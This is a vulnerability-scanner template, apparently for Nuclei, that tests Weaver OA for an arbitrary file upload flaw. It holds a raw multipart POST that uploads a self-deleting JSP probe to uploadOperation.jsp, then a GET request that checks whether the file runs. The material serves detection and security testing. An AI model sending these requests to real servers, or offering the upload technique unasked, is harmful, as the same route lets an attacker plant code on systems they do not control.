id: poc-yaml-weaver-oa-arbitrary-file-upload

info:
  name: poc-yaml-weaver-oa-arbitrary-file-upload
  author: jingling(https://github.com/shmilylty)
  severity: critical
  tags: xray-converted,fileupload,ct-158047
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

http:
  - raw:
      - |
        POST /page/exportImport/uploadOperation.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed

        --b0d829daa06c13d6b3e16b0ad21d1eed
        Content-Disposition: form-data; name="file"; filename="{{rand_base(8)}}.jsp"
        Content-Type: application/octet-stream
        
        <%out.print({{rand_int(1000, 9999)}} * {{rand_int(1000, 9999)}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        --b0d829daa06c13d6b3e16b0ad21d1eed--
        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /page/exportImport/fileTransfer/{{rand_base(8)}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200